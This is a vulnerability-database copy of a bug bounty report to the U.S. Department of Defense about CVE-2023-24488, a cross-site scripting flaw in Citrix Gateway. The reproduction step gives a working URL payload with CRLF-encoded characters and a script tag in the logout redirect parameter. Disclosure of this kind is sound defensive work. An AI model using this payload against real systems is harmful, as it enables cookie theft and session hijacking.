Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackerone0xmarufH1:2045549
HistoryJul 01, 2023 - 3:41 a.m.

U.S. Dept Of Defense: CVE-2023-24488 xss on https://██████/

2023-07-0103:41:40
0xmaruf
hackerone.com
22
dept of defense
cve-2023-24488
xss
malicious js
cookie stealing
bug bounty

0.055 Low

EPSS

Percentile

93.2%

JSON

Description:

References

Impact

malicios js inejction , cookie stealing

System Host(s)

█████████

Affected Product(s) and Version(s)

CVE Numbers

CVE-2023-24488

Steps to Reproduce

  1. https://█████/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>

Suggested Mitigation/Remediation Actions

Related

prion 1
cve 1
nuclei 1
nvd 1
githubexploit 4
cvelist 1
nessus 1
citrix 1
prion
prion
Cross site scripting
2023-07-10 21:15:00
cve
cve
CVE-2023-24488
2023-07-10 21:15:10
nuclei
nuclei
Citrix Gateway and Citrix ADC - Cross-Site Scripting
2023-06-30 17:58:56
nvd
nvd
CVE-2023-24488
2023-07-10 21:15:10
githubexploit
githubexploit
Exploit for Cross-site Scripting in Citrix Gateway
2023-07-04 00:29:56
Exploit for Cross-site Scripting in Citrix Gateway
2023-07-04 18:02:50
Exploit for Cross-site Scripting in Citrix Gateway
2023-07-01 17:47:17
cvelist
cvelist
CVE-2023-24488 Cross site scripting
2023-07-10 20:41:31
nessus
nessus
Citrix ADC and Citrix Gateway Multiple Vulnerabilities (CTX477714)
2023-05-11 00:00:00
citrix
citrix
Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-24487, CVE-2023-24488
2023-05-09 13:26:49

0.055 Low

EPSS

Percentile

93.2%

JSON
Related for H1:2045549
prion1cve1nuclei1nvd1githubexploit4cvelist1nessus1citrix1